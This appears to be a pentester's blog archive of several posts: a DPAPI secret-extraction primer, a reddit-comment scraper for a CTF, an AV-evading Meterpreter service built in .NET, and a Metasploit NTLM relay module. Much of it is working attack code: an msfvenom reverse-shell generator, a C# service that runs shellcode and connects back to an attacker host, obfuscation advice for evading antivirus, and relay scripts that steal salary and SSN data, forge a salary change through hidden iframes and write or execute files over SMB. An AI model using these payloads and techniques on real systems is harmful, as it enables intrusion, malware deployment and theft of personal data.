DPAPI Primer for Pentesters

Update 6 July 2013 – fixed info on when the user store may decrypt on a separate machine

Understanding DPAPI is not that complicated, although the amount of documentation can be daunting. There is a lot of excellent “under the hood” DPAPI material available (e.g. Stealing Windows Secrets Offline, http://www.blackhat.com/html/bh-dc-10/bh-dc-10-briefings.html). But is it easier to steal these secrets online? The answer is yes, probably.

DPAPI’s purpose in life is to store secrets. These are frequently symmetric crypto keys used to encrypt other things. Typical use cases range from encrypting saved passwords in an RDP connection manager on a desktop to encrypting sensitive info in a database (e.g. bank account numbers). Using DPAPI to store sensitive info (or to store the keys that encrypt sensitive info) is good practice.

There are a few concepts to understand before using DPAPI

  • You can encrypt/decrypt the secrets using either a “user store” or a “machine store”. This is where the entropy comes from. What this means is:
    • If you use the user store, the secret can only be read by that user on that machine. In the testing I’ve done, it could not be read by the same domain user on a different machine either (though see the update and KB excerpt below – with domain accounts and roaming profiles this should generally work).
    • If you use the machine store, any user on the machine is able to decrypt the secrets – including the Network Service account (e.g. IIS), Guest, etc. In the testing I’ve done, this is certainly less restrictive/secure than the user store (the user store takes the machine into account as well).
  • Secondary Entropy: one of the arguments to the DPAPI calls is a secondary entropy value. An application must supply this same secret before the data can be decrypted (see the sketch just after this list).
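To make the two stores and the entropy argument concrete, here is a minimal sketch using the Win32 DPAPI calls from Python – this assumes pywin32 (win32crypt) is available; the examples later in this post use the equivalent .NET ProtectedData API:

#!/usr/bin/python
# minimal DPAPI sketch - assumes pywin32 (win32crypt) is installed
import win32crypt

CRYPTPROTECT_LOCAL_MACHINE = 0x4   # wincrypt.h flag selecting the machine store

secret = "my symmetric key material"
entropy = "AAAA"   # secondary entropy - the decryptor must supply the same value

# user store: only this user (on this machine, roaming profiles aside) can decrypt
user_blob = win32crypt.CryptProtectData(secret, None, entropy, None, None, 0)

# machine store: any user on this machine can decrypt
machine_blob = win32crypt.CryptProtectData(secret, None, entropy, None, None,
                                           CRYPTPROTECT_LOCAL_MACHINE)

# decryption returns a (description, data) tuple and fails without the right entropy/context
print win32crypt.CryptUnprotectData(user_blob, entropy, None, None, 0)[1]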

A few common misconceptions

  • I’ve heard from several people that the user’s login password is used for entropy. This does not really tell the whole story. An attacker does not need to know the password to retrieve DPAPI-protected secrets; they just need to be executing as that account (or on that machine, for the machine store). This is often an easier problem than retrieving a password.
  • It can be easy to mix up DPAPI and other things that make use of DPAPI. For example, the credential store is an API that uses DPAPI.

A pretend good setup

If things are done basically correctly, then a good scheme might be something like this:

  • There’s a server database that stores encrypted bank account numbers 
    • It needs to decrypt these for regular use
    • The encryption/integrity of this data uses a good authenticated encryption scheme, say AES/GCM.
  • The question is, where do we store the key?
    • We use DPAPI in user mode to encrypt the data
    • The user that can access the data is a locked-down domain service account with limited permissions. For example, the service account can’t log in to the box, and is a different user than the one the database runs as.
    • The DPAPI encrypted blob is stored in an ACLed part of the registry so only the service account has access

An overly simplified example might be the following, which runs at deployment time.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.Win32;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Security.AccessControl;

namespace encrypt_dpapi
{
    class Program
    {
        private const string MASTER_REG_KEY_PATH = @"SOFTWARE\Contoso\dbapp";
        private const string MASTER_REG_KEY_NAME = @"bankkey";
        private const string SERVICE_ACCT = @"EVIL\_mservice";

        public static void WriteMachineReg(string path, string valuename, string value)
        {
            RegistryKey bank_reg = Registry.LocalMachine.CreateSubKey(path);

            //set the ACLs of the key so only the service account has access
            RegistrySecurity acl = new RegistrySecurity();
            acl.AddAccessRule(new RegistryAccessRule(SERVICE_ACCT, RegistryRights.FullControl, AccessControlType.Allow));
            acl.SetAccessRuleProtection(true, false);

            bank_reg.SetAccessControl(acl);

            //write the DPAPI-protected key
            bank_reg.SetValue(valuename, value);

            bank_reg.Close();
        }

        //we want the symmetric key to be randomly generated and no one to even know it!
        public static byte[] genSymmetricKey(int size)
        {
            RNGCryptoServiceProvider rng = new RNGCryptoServiceProvider();
            byte[] buf = new byte[size];
            rng.GetBytes(buf);
            return buf;
        }

        static void Main(string[] args)
        {
            //check that we're running as the correct service account
            string user = WindowsIdentity.GetCurrent().Name;
            if (!user.Equals(SERVICE_ACCT, StringComparison.OrdinalIgnoreCase))
            {
                Console.WriteLine("Error: must run as " + SERVICE_ACCT + " Account");
                Console.WriteLine(user);
                Console.WriteLine("Exiting program");
                return;
            }


            //generate a random key we'll use to encrypt bank accounts
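            //(256 random bytes here; a 256-bit AES key would only need 32 bytes)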
            byte[] key = genSymmetricKey(256);
            Console.WriteLine("Key " + Convert.ToBase64String(key));

            byte[] additional_entropy = {0x41, 0x41, 0x41, 0x41};

            //dpapi encrypt the key
            byte[] enc_key = ProtectedData.Protect(key, additional_entropy, DataProtectionScope.CurrentUser);

            //dpapi encrypted key is saved in base64
            WriteMachineReg(MASTER_REG_KEY_PATH, MASTER_REG_KEY_NAME, Convert.ToBase64String(enc_key));


        }
    }
}

If I run this, I get

>encrypt_dpapi.exe
Key 721HLUm5n9/0hpAFtBl3Jvn2jJ+KM3z4mPKfyLCHOAZyx/JUP6qs+DCVpwWCqbmB3CZc+o6qXeY4
T+ivRkgn6ZLUSTInuhIh96qRPC9DXZD/ALUg5NTdoWtxYaSq4uOeF6ywh1hRyLyVKSopdHkR4ZycFKV9
KIIX+O5pKK/sYBRwvkhnIwpbLO3Qps7FK5x3wNlj5OwLOfl31bs8rE0Qk/yzvhzT5+zF7BJx/j/qUCGa
g8f8PGOBhi/Ch0lGDWW203rbwdfMC8fmHAYfR4FdlU2L90lmEOCY8Mgjno4ScAGgKPyFS74TLaufLKiz
tjBaAKt89JGaNHOizWvdIGsoMw==

This is the base64 version of the key used to decrypt bank account numbers – so ultimately what we as attackers want. But if I look in the registry (where this info is stored) I get something completely different

[Screenshot: dpapi_registry – the DPAPI-encrypted blob as it appears in the registry]

So how can we get decrypted Bank Account Numbers?

Say we’re an attacker and we have system privs on the box above. How can we decrypt the bank account numbers?

There’s probably more than one way. One method may be to scan the process memory and extract the key (but if the app uses safe memory protection it may not be in there long…). Another method may be to attach a debugger to the app and extract it that way. For a production pentest, one of the most straightforward ways is just to use DPAPI again to decrypt the data.

using System;
using System.Text;
using System.Runtime.InteropServices;
using System.ComponentModel;
using Microsoft.Win32;
using System.Security.Cryptography;



namespace decrypt_dpapi_reg
{

    public class registry
    {
        public static string ReadMachineReg(string path, string valuename)
        {
            return (string)Registry.GetValue(path, valuename, "problem");
        }
    }

    class Program
    {

        private const string MASTER_REG_KEY_PATH = @"SOFTWARE\Contoso\dbapp";
        private const string MASTER_REG_KEY_NAME = @"bankkey";
        private const string SERVICE_ACCT = @"EVIL\_mservice";   


        public static byte[] UnprotectUser(string data)
        {
            try
            {
                byte[] additional_entropy = { 0x41, 0x41, 0x41, 0x41 };
                byte[] encryptData = Convert.FromBase64String(data);
                return ProtectedData.Unprotect(encryptData, additional_entropy, DataProtectionScope.CurrentUser);
                
            }
            catch (CryptographicException e)
            {
                Console.WriteLine("Data was not decrypted. An error occurred.");
                Console.WriteLine(e.ToString());
                return null;
            }
        }


        static void Main(string[] args)
        {
            //must be run as a user with access on a machine with access
            string s = registry.ReadMachineReg(@"HKEY_LOCAL_MACHINE\" + MASTER_REG_KEY_PATH, MASTER_REG_KEY_NAME);

            Console.WriteLine("DPAPI encrypted key: " + s);
            Console.WriteLine();

            Console.WriteLine("DPAPI encrypted key: " + BitConverter.ToString(Convert.FromBase64String(s)));
            Console.WriteLine();

            byte[] decryptedbytes = UnprotectUser(s);
            if (decryptedbytes != null)
            {
                Console.WriteLine(Convert.ToBase64String(decryptedbytes));
            }
            
        }
    }

}

If we try to run this as another user, what happens? It won’t work. We’ll get an exception like this:

System.Security.Cryptography.CryptographicException: Key not valid for use in specified state.

   at System.Security.Cryptography.ProtectedData.Unprotect(Byte[] encryptedData,Byte[] optionalEntropy, DataProtectionScope scope)
   at decrypt_dpapi_reg.Program.UnprotectUser(String data)

DPAPI uses the user’s entropy to encrypt the data, so we need to compromise the user. But what happens if we copy the registry value out to another machine and try to use DPAPI to decrypt the secrets on another box as the EVIL\_mservice account?

It turns out in my testing this did not work, and I got the same exception as a bad user on the same machine – I needed to run on the same machine that encrypted the key. UPDATE: there are several reasons it may not have worked in my testing, but in general it should work. From http://support.microsoft.com/kb/309408#6:

DPAPI works as expected with roaming profiles for users and computers that are joined to an Active Directory directory service domain. DPAPI data that is stored in the profile acts exactly like any other setting or file that is stored in a roaming profile. Confidential information that the DPAPI helps protect are uploaded to the central profile location during the logoff process and are downloaded from the central profile location when a user logs on.
For DPAPI to work correctly when it uses roaming profiles, the domain user must only be logged on to a single computer in the domain. If the user wants to log on to a different computer that is in the domain, the user must log off the first computer before the user logs on to the second computer. If the user is logged on to multiple computers at the same time, it is likely that DPAPI will not be able to decrypt existing encrypted data correctly.
DPAPI on one computer can decrypt the master key (and the data) on another computer. This functionality is provided by the user’s consistent password that is stored and verified by the domain controller. If an unexpected interruption of the typical process occurs, DPAPI can use the process described in the “Password Reset” section later in this article.
There is a current limitation with roaming profiles between Windows XP-based or Windows Server 2003-based computers and Windows 2000-based computers. If keys are generated or imported on a Windows XP-based or Windows Server 2003-based computer and then stored in a roaming profile, DPAPI cannot decrypt these keys on a Windows 2000-based computer if you are logged on with a roaming user profile. However, a Windows XP-based or Windows Server 2003-based computer can decrypt keys that are generated on a Windows 2000-based computer.

Blackbox Detection

DPAPI can be really tough to identify in a complete blackbox test. As part of an engagement, if I’ve compromised this far, I usually go hunting for the source, which is frequently less protected than the DPAPI-protected asset. But one giveaway that you’re even dealing with DPAPI is a blob with a structure similar to the following:

[Image: dpapi_format – structure of a DPAPI-encrypted blob]

We can be a bit more scientific about this. Comparing two runs of the same program above gives the following bytes in common (note that since the key itself is random but a constant length, this reveals a bit about the structure). This is documented better elsewhere, I’m sure, but if something looks quite a bit like this, it should give you a quick idea whether you’re dealing with a DPAPI-encrypted blob.

01-00-00-00-D0-8C-9D-DF-01-15-D1-11-8C-7A-00-C0-4F-C2-97-EB
-01-00-00-00-08-DC-D9-58-94-2E-C9-4A-9C-59-12-F1-60-EA-6C-56-00-00-00-00-02-00-0
0-00-00-00-03-66-00-00-C0-00-00-00-10-00-00-00-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-
xx-xx-xx-xx-xx--00-00-00-00-04-80-00-00-A0-00-00-00-10-00-00-00-xx.....

Dan Guido’s Favorite Food? (A script to search reddit comments)

CSAW CTF was fun. My team (ACMEPharm) solved all the challenges but network 400, which was a dumb challenge anyway :P

One of the other challenges we struggled with was a recon one: “what is Dan Guido’s favorite food”? There was also a hint that said something like “A lot of our users use reddit”. Since we had already solved all the other recon challenges and none required reddit, we were fairly certain this was where to look. Looking at dguido’s page there are tons of links – he’s part of the 5 year club.

Reddit has a robots.txt that tells search engines not to crawl it, and a user’s comments aren’t indexed, so they aren’t searchable using its site search either. This was the motivation for me to scrape a user’s comments so I could search through them locally.

#!/usr/bin/python

import urllib
import sys
import time

class AppURLopener(urllib.FancyURLopener):
    version = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1"

urllib._urlopener = AppURLopener()

class redditScrape:
    def __init__(self, startpage):
        self.thispage = startpage
        self.counter = 1

    def getInfo(self):
        while 1:
            print "Fetching ", self.thispage
            f = urllib.urlopen(self.thispage)
            data = f.read()
            self.saveHtml(data)
            self.getNextPage(data)
            #reddit asks for only one request every two seconds
            time.sleep(2)

    def saveHtml(self, data):
        f = open(str(self.counter), "w")
        f.write(self.thispage + "\n\n")
        f.write(data)
        f.close()

    def getNextPage(self, data):
        index = data.find("rel=\"nofollow next\"")
        if index == -1:
            print "Search done"
            sys.exit(0)
        else:
            hrefstart = data.rfind("href", 0, index) + 6
            hrefend = data.find("\"", hrefstart)
            self.thispage = data[hrefstart: hrefend]
            self.counter += 1

a = redditScrape("http://www.reddit.com/user/dguido")
a.getInfo()

Then I would

grep -Ri "cheese" .
grep -Ri "pizza" .
...

Unfortunately the answer turned out to be in another person’s comment so my script missed it, but someone else on my team found it not long after… in a thread I was blabbering in.

AV Evading Meterpreter Shell from a .NET Service

Update: I tried this in April 2013, and it still works quite well if you obfuscate the .NET (e.g. using Dotfuscator – there are also plenty of free obfuscators). I still use the general idea for SMB-type things, like NTLM relaying. That said, for simply evading AV, I highly recommend going the PowerShell route instead. PowerSploit has meterpreter connectback built in, so you don’t even need to do anything. It’s awesome: https://github.com/mattifestation/PowerSploit

Quite a few successful attacks rely on creating a malicious service at some point in the attack chain. This can be very useful for a couple of reasons. First, in post-exploitation scenarios these services are persistent, and (although noisy) they can be set to start when a connection fails or across reboots. Second, malicious services are also an extremely common way that boxes are owned in the first place – it’s part of how psexec and SMB NTLM relaying work. In Metasploit these are by default exploit modules, most commonly used by selecting from their available payloads. One thing people may not realize is that these payloads are just turned into service binaries and then executed. You don’t necessarily need to use low-level machine code – your “shellcode” can just be written in .NET if you want.

The strategy I’ll use here is to create a stage 1 .NET meterpreter service that connects back to our stage 2 host.

Maybe the easiest way to create a service is to use Visual Studio. Go to New Project and select Windows Service, which should give you a nice skeleton.

Generate our stage 1 and put it in a C# byte array format. I wrote a python script to do this.

#!/usr/bin/python

###
# simple script that generates a meterpreter payload suitable for a .net executable
###

import argparse
import re
from subprocess import *

parser = argparse.ArgumentParser()
parser.add_argument('--lhost', required=True, help='Connectback IP')
parser.add_argument('--lport', required=True, help='Connectback Port')
parser.add_argument('--msfroot', default='/opt/metasploit/msf3')
args = parser.parse_args()


def create_shellcode(args):
    msfvenom = args.msfroot + "/msfvenom"
    msfvenom = (msfvenom + " -p windows/meterpreter/reverse_tcp LHOST=" + args.lhost + " LPORT=" + args.lport + " -e x86/shikata_ga_nai -i 15 -f c")
    msfhandle = Popen(msfvenom, shell=True, stdout=PIPE)
    try:
        shellcode = msfhandle.communicate()[0].split("unsigned char buf[] = ")[1]
    except IndexError:
        print "Error: Do you have the right path to msfvenom?"
        raise
    #put this in a C# format
    shellcode = shellcode.replace('\\', ',0').replace('"', '').strip()[1:-1]
    return shellcode

print create_shellcode(args)

Next, we can copy/paste our shellcode into a skeleton C# service and execute it by VirtualAlloc’ing a bit of executable memory and creating a new thread. One of my buddies pointed me at http://web1.codeproject.com/Articles/8130/Execute-Native-Code-From-NET, which was helpful when writing this.

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Diagnostics;
using System.Linq;
using System.ServiceProcess;
using System.Text;
using System.Runtime.InteropServices;

namespace metservice
{
    public partial class Service1 : ServiceBase
    {
        public Service1()
        {
            InitializeComponent();
        }

        protected override void OnStart(string[] args)
        {
            // native function's compiled code
            // generated with metasploit
            byte[] shellcode = new byte[] {
0xbf,0xe2,0xe6,0x44,.... (stage 1 shellcode)
                };

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data


            IntPtr pinfo = IntPtr.Zero;

            // execute native code

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

      }

        private static UInt32 MEM_COMMIT = 0x1000;

        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;


        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
             UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress,
                              UInt32 dwSize, UInt32 dwFreeType);

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(

          UInt32 lpThreadAttributes,
          UInt32 dwStackSize,
          UInt32 lpStartAddress,
          IntPtr param,
          UInt32 dwCreationFlags,
          ref UInt32 lpThreadId

          );
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(

          IntPtr hHandle,
          UInt32 dwMilliseconds
          );
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(

          string moduleName

          );
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(

          IntPtr hModule,
          string procName

          );
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(

          string lpFileName

          );
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();


        protected override void OnStop()
        {
        }
    }
}

We still need to create our stage 2 listener on our attacker box from within metasploit.

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LPORT 443
...

Now we have our service which, when added and started, will connect back to our listening attacker box, at which point we have a meterpreter shell running as SYSTEM.
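For example, if the service binary has already been copied to the target (as in the relay resource below), adding and starting it by hand would look something like this – the service and binary names here just mirror that example:

sc \\mwebserver create metservice binPath= "C:\Windows\rla7cu.exe"
sc \\mwebserver start metservice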

This is close to exactly what I did here with my http_ntlmrelay module. Using that, there are two steps: one is uploading our malicious .NET service, and the second is starting that service.

use auxiliary/server/http_ntlmrelay
#SMB_PUT our malicious windows service (named metservice.exe) onto the victim
set RHOST mwebserver
set RPORT 445
set RTYPE SMB_PUT
set URIPATH /1
set RURIPATH c$\\Windows\\rla7cu.exe
set FILEPUTDATA /root/ntlm_demo/smb_pwn/metservice.exe
run
#Execute the malicious windows service
set RTYPE SMB_PWN
set RURIPATH %SystemRoot%\\rla7cu.exe
set URIPATH /2
run

Out of the box, this service already evades most AV (there were 0 detections when I uploaded it to VirusTotal).

However, as AV companies do, they could update their signatures to figure out a way of detecting this. In the middle of a pentest, I already got an email from a concerned stakeholder asking about this service, which I had named “gonnaownyou” or something (yes, I know, sloppy, but I can be loud and arrogant). This concerned stakeholder said they were in the process of analyzing the binary to determine whether it was malicious. Surprised they had detected anything, I immediately dropped the binary into Reflector, and it really couldn’t be more obvious that it is in fact malicious. I mean, my byte array is named “shellcode”, even in Reflector.

As an attacker, the good news is we’re in .NET land now. It’s really very easy to modify C# compared to low-level shellcode. All our real shellcode is just a byte array, which we can hide however the hell we want – we could easily download it from somewhere, use encryption, etc. with only a few code changes. In fact, we might not even have to modify our code above at all. There is an entire legitimate market for making managed code tough to analyze, to protect IP and whatnot – think Dotfuscator. I’m not an AV guy – I usually know just enough to evade it – but it seems to me that detecting our dotfuscated shellcode would be a difficult problem for an AV company.
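As a rough illustration of the “hide the bytes” idea (just one obvious option, not what the code above does), a build-time helper could XOR-encode the payload and emit a C# array, with the service XOR-decoding it again right before the Marshal.Copy:

#!/usr/bin/python
# toy XOR encoder - emits a C# byte array of the encoded payload
# (illustrative only; any reversible encoding or real crypto would do)
KEY = 0x5A

def encode(shellcode_bytes):
    return [b ^ KEY for b in shellcode_bytes]

if __name__ == "__main__":
    raw = [0xbf, 0xe2, 0xe6, 0x44]   # replace with the real stage 1 bytes
    encoded = encode(raw)
    print "byte[] encoded = new byte[] { " + ", ".join("0x%02x" % b for b in encoded) + " };"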

You know how it’s often referred to as an arms race/escalation game when people try to bypass AV, and then AV companies try to detect that? You know how they say basically the same thing about code obfuscating type solutions? Well, I don’t like spending my time evading AV, so I have this funny fantasy where I pit the code obfuscator people against the AV companies and they escalate their approaches against each other, leaving me out of the escalation equation completely :)

Metasploit Generic NTLM Relay Module

I recently put in a pull request for a Metasploit module I wrote that does NTLM relaying (I recommend this post for some background). I also have a time slot for a tool arsenal thing at blackhat. Here’s the description:

NTLM auth blobs contain the keys to the kingdom in most domain environments, and relaying these credentials is one of the most misunderstood and deadly attacks in a hacker’s corporate arsenal. Even for smart defenders it’s almost like a belief system; some people believe mixed mode IIS auth saves them, NTLMv2 is not exploitable, enabling the IIS extended protection setting is all you need, it was patched with MS08-068, you have to be in the middle, you have to visit a website, you have to be an administrator for the attack to matter, etc. etc.

http_ntlm_relay is a highly configurable Metasploit module I wrote that does several very cool things, allowing us to leverage the awesomeness of Metasploit and show the way for these non-believers:

  • HTTP -> HTTP NTLM relay with POST, GET, HTTPS support.
  • HTTP -> SMB NTLM relay with ENUM_SHARES, LS, WRITE, RM, and EXEC support. This extended support allows a lot of interesting attacks against non admins and multiple browsers that aren’t currently available in Metasploit.
  • NTLMv2 support, which means that this attack now works a lot more often on modern windows environments.
  • Mutex support allowing information from one request to be used in a future request. A simple example of this would be a GET to retrieve a CSRF token used in a POST. A more complex example would be an HTTP GET request to recover computer names, and then using that information to SMB relay to those computers for code execution.

It will be open source and I’ll try my darndest to get it included in Metasploit proper before Blackhat.

With this module, I made a choice for flexibility over some other things. Although basic usage is fairly straightforward, some of the more advanced functionality might not be. This post will give some usage examples. I have desktop captures of each example; full-screen and HD those suckers if you want to see what’s going on.

Stealing HTTP Information

Corporate websites that use NTLM auth are extremely common, whether they’re sharepoint, mediawiki, ERP systems, or (probably most commonly) homegrown applications. To test my module out, I wrote a custom application that uses Windows Auth. I did it this way so I could easily reconfigure without too much complexity (although I have tested similar attacks against dozens of real sharepoint sites, mediawiki, and custom webpages). This simple example is an app that displays some information about the user visiting. Think of it as an internal paystub app that HR put up.

IIS is set to authenticate with Windows auth:

All domain accounts are authorized to see their own information, which it grabs out of a DB:


<asp:SqlDataSource
    id="SqlDataSource1"
    runat="server"
    DataSourceMode="DataReader"
    ConnectionString="<%$ ConnectionStrings:ApplicationServices%>">

...

Username.Text = Page.User.Identity.Name;
String username = Page.User.Identity.Name;

SqlDataSource1.SelectCommand = "SELECT * FROM Employee WHERE username='" + Page.User.Identity.Name + "'";
GridView1.DataBind();

So let’s attack this, shall we? I made the following resource file:

#This simple resource demonstrates how to collect salary info from an internal HTTP site authed with NTLM
#to extract run the ballance_extractor resource

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RURIPATH /ntlm/EmployeeInfo.aspx
set SYNCID empinfo
set URIPATH /info
run

Now our HTTP server sits around and waits for someone to connect. Once someone does and sends their NTLM creds, the credentials are passed along to the web server, and the data is saved to the notes database. We can look at the raw HTML, or, with the data at our disposal, extract the relevant info with a resource script.

#extract the employee salary info from the database


<ruby>
#data is the saved response
def extract_empinfo(data)
	fdata = []
	bleck = data.body
	empdata = bleck.split('<td>')[2..-1]
	empdata.each do |item|
		fdata.push(item.split('</td>')[0])
	end
	return (fdata)
end


framework.db.notes.each do |note|
	if (note.ntype == 'ntlm_relay')
		begin
			#SYNCID was set to "empinfo" on the request that retrieved the relevant values
			if note.data[:SYNCID] == "empinfo"
				empinfo = extract_empinfo(note.data[:Response])
				print_status("#{note.data[:user]}: Salary #{empinfo[0]}  |  SSN: #{empinfo[4]}")
			end
		rescue
			next
		end
	end
end
</ruby>


Here’s that in action.

HTTP CSRF

Whether they’re HTTP requests or something else, a lot of the really interesting attacks simply require more than one request. Look at any time we want to POST and change data: if the website has protection against CSRF, this should take at least two requests – one to grab the CSRF token and another to do the POST that changes state.

In my dummy app, a member of the “cxo” active directory security group has permission to edit anyone’s salary. This extreme functionality for a privileged few is super common. Think ops administration consoles, help desk type tools, HR sites, etc. The goal of this attack is to change “mopey’s” salary to -$100 after a member of the cxo group visits our site.

The first step for me is just to run the interface as normal through an HTTP proxy. In this case, it took three requests for me to edit the salary, and each request requires data to be parsed out – namely the VIEWSTATE and EVENTVALIDATION POST values. HTTP_ntlmrelay was designed to support this sort of scenario. We’ll be using the SYNCFILE option to extract the relevant information and update the requests dynamically.

Here’s the resource file


#This demonstrates how to do a CSRF against an "HR" app using NTLM for auth
#It grabs the secret from a GET request, then a POST request and uses that secret in a subsequent POST request
#This is a semi-advanced use of this auxiliary module, demonstrating how it can be customized

#to use, from msf run this resource file, and force a victim to visit a page that forces the 3 requests
#to modify the content put in the wiki, edit extract_2.rb

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RTYPE HTTP_GET
set RURIPATH /ntlm/Admin.aspx
set URIPATH /grabtoken1
set SYNCID csrf
run
set SYNCID csrf2
set URIPATH /grabtoken2
set RTYPE HTTP_POST
set SYNCFILE /root/ntlm_relay/bh_demos/http_csrf/extract_1.rb
set HTTP_HEADERFILE /root/ntlm_relay/bh_demos/http_csrf/headerfile
run
unset SYNCID
set URIPATH /csrf
set SYNCFILE /root/ntlm_relay/bh_demos/http_csrf/extract_2.rb
set HTTP_HEADERFILE /root/ntlm_relay/bh_demos/http_csrf/headerfile
run

extract_1.rb extracts the secret information from the first GET request, which the second request uses. Note the requests go one at a time – you have a guarantee one request will completely finish before the next one begins.

# cat extract_1.rb
#grab the request with the ID specified

#extract the viewstate value
def extract_viewstate(data)
	bleck = data.body
	viewstate = bleck.split('"__VIEWSTATE"')[-1].split("\" />")[0].split('value="')[1].strip
	return viewstate
end

#extract the Eventvalidation
def extract_eventvalidation(data)
	bleck = data.body
	eventvalidation = bleck.split('"__EVENTVALIDATION"')[-1].split("\" />")[0].split('value="')[1].strip
	return eventvalidation
end

framework.db.notes.each do |note|
	if (note.ntype == 'ntlm_relay')
		#SYNCID was set to "csrf" on the request that retrieved the relevant values
		if note.data[:SYNCID] == "csrf"
			print_status("Found GET request containing CSRF stuff. Extracting...")
			viewstate = extract_viewstate(note.data[:Response])
			eventvalidation = extract_eventvalidation(note.data[:Response])

			datastore['FINALPUTDATA'] = (
				"__EVENTTARGET=ctl00%24MainContent%24GridView1&__EVENTARGUMENT=Edit%243&__VIEWSTATE=" +
				Rex::Text.uri_encode(viewstate) + "&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=" +
				Rex::Text.uri_encode(eventvalidation)
				)
			puts(datastore['FINALPUTDATA'])
		end
	end
end

extract_2.rb is nearly identical, except the POST data needs our CSRF values and the requests we’re parsing are different (we have a separate SYNCID we’re looking for).

# cat extract_2.rb
#grab the request with the ID specified

new_salary = "-100"
victim = "EVIL%5Cmopey"

#extract the viewstate value
def extract_viewstate(data)
	bleck = data.body
	viewstate = bleck.split('"__VIEWSTATE"')[-1].split("\" />")[0].split('value="')[1].strip
	return viewstate
end

#extract the Eventvalidation
def extract_eventvalidation(data)
	bleck = data.body
	eventvalidation = bleck.split('"__EVENTVALIDATION"')[-1].split("\" />")[0].split('value="')[1].strip
	return eventvalidation
end

framework.db.notes.each do |note|
	if (note.ntype == 'ntlm_relay')
		#SYNCID was set to "csrf2" on the request that retrieved the relevant values
		if note.data[:SYNCID] == "csrf2"
			print_status("Found Second request containing CSRF stuff. Extracting...")
			viewstate = extract_viewstate(note.data[:Response])
			eventvalidation = extract_eventvalidation(note.data[:Response])

			datastore['FINALPUTDATA'] = (
				"__EVENTTARGET=ctl00%24MainContent%24GridView1%24ctl05%24ctl00&__EVENTARGUMENT=&__VIEWSTATE=" +
				Rex::Text.uri_encode(viewstate) + "&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=" +
				Rex::Text.uri_encode(eventvalidation) + "&ctl00%24MainContent%24GridView1%24ctl05%24ctl02=" +
				victim + '&ctl00%24MainContent%24GridView1%24ctl05%24ctl03=' + new_salary
				)
			puts(datastore['FINALPUTDATA'])
		end
	end
end

The HTTP_HEADERFILE option is easier to explain. The file is just a list of HTTP headers…

# cat headerfile
Content-Type: application/x-www-form-urlencoded

Lastly, I put all three requests in a nice rick roll package. This is the site the victim will visit with their browser in the final attack.

<iframe src="http://192.168.138.132:8080/grabtoken1" style='position:absolute; top:0;left:0;width:1px;height:1px;'></iframe>
<iframe src="http://192.168.138.132:8080/grabtoken2" style='position:absolute; top:0;left:0;width:1px;height:1px;'></iframe>
<iframe src="http://192.168.138.132:8080/csrf" style='position:absolute; top:0;left:0;width:1px;height:1px;'></iframe>

<h1>Never gonna Give you Up!!!</h1>
<iframe width="420" height="315" src="http://www.youtube.com/embed/dQw4w9WgXcQ" frameborder="0" allowfullscreen></iframe>


Here’s the whole thing in action. In this video I fail the rickroll due to my lack of Flash in IE, but the attack works. Despite good CSRF protection, mopey’s salary is successfully modified by visiting a malicious website.

Yes, it’s kind of complicated to parse HTML and extract values, but that’s just the nature of the problem. I’ve done this several times. In this archive there’s a mediawiki POST that edits an NTLM-authed page. It’s similar to the above, but requires a multipart form and an authentication cookie (which you can use the headerfile option for). HTTP_ntlmrelay is designed to do one request at a time, but multiple requests can easily be stacked on the browser side (like I did here with the hidden iframes).

SMB File Operations

There’s (usually) no reason you can’t use a browser’s NTLM handshake to authenticate to an SMB share, and from there, all the regular file operations you’d expect should be possible. Because there’s no custom HTML to parse or anything, this is actually a lot simpler to demonstrate. The setup is the same as above: a fully patched browser client on one machine being relayed to a separate, fully patched, default Win 2008 R2 domain machine (mwebserver).

#This simple resource enums shares, then writes, lists, reads, and removes a file

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RPORT 445
#smb_enum
set RTYPE SMB_ENUM
set URIPATH smb_enum
run
#SMB_PUT
set RTYPE SMB_PUT
set URIPATH smb_put
set RURIPATH c$\\secret.txt
set PUTDATA "hi ima secret"
set VERBOSE true
run
#smb_ls
unset PUTDATA
set RTYPE SMB_LS
set URIPATH smb_ls
set RURIPATH c$\\
run
#smb_get
set RTYPE SMB_GET
set URIPATH smb_get
set RURIPATH c$\\secret.txt
run
#smb_rm
set RTYPE SMB_RM
set URIPATH smb_rm
set RURIPATH c$\\secret.txt
run

Another cool thing: with current attacks like the smb_relay module you pretty much need to be an admin, and that’s still true here if you want to start services. But any Joe that can authenticate might be able to write/read to certain places. Think about how corporate networks might do deployment with development boxes, distribute shared executables, transfer shares, etc., and you might get the idea. Below I replace somebody’s WinSCP on their desktop with something that has a WinSCP icon and just does a system call to calculator (this is from a different lab, but the idea applies anywhere).

SMB Pwn

How does psexec work? Oh yeah, it uses SMB :) You astute folks may have known this all along, but showing this off to people… they’re just amazed at how pwned they can get by visiting a website.

